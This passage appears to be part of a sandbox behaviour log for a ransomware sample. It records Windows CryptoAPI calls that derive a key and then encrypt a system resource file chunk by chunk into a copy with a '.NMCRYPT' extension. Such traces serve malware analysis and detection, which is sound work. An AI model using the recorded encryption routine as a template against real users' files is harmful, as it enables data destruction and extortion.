hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.112] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.113] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.113] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.114] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0159.114] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.114] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad5f8) returned 1 [0159.114] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.114] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.114] wcslen (_String="\\\\?\\") returned 0x4 [0159.114] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad438) returned 1 [0159.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.114] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.115] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.115] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.115] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.116] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.116] GetLastError () returned 0x0 [0159.116] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.139] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.140] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.140] GetLastError () returned 0x0 [0159.140] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.140] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.141] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.141] GetLastError () returned 0x0 [0159.141] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.141] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.142] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.142] GetLastError () returned 0x0 [0159.142] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.142] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.143] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.143] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.143] GetLastError () returned 0x0 [0159.143] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, 